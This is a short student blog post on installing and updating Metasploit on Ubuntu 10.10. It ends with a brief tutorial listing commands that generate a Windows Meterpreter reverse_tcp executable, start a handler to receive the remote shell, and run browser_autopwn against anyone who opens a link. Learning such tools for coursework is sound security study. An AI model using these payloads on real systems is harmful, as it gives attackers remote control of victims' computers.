Basically my current module in university requires me to get in touch with Metasploit so here is one of the links that helped me installing them on my Ubuntu 10.10 Maverick Meerkat. Read more to learn on how to install and update Metasploit and a quick sample of how to use it.
When you have downloaded the file
</pre> <pre dir="ltr">sudo chmod +x framework-3.5.2-linux-i686.run sudo ./framework-3.5.2-linux-i686.run // change the framework version to yours // launch metasploit by doing ./msfconsole
How to update your Metasploit
If you have installed the Metasploit Framework using the official Linux binary installers, simply enter msfupdate as root. For all other Linux users, change into the Metasploit Framework installation directory (/opt/metasploit3/msf3 is recommended) and issue the svn update command as root. The “svn” command is part of the Subversion source code management tool and available on most distributions. To configure automatic updates, please refer to the Linux installation page for examples using cron.
Simple Meterpreter payloads tutorial
// Some quick reminders // method 1 // uses .exe file that have to be executed msfpayload windows/meterpreter/reverse_tcp LHOST=IP_HERE x>EXECUTABLE_FILE.exe msfconsole use multi/handler set payload windows/meterpreter/reverse_tcp set lhost IP_HERE set rhost IP_HERE exploit // method 2 // uses a link that have to be browsed use auxillary/server/browser_autopwn set LHOST IP_HERE set URIPATH / exploit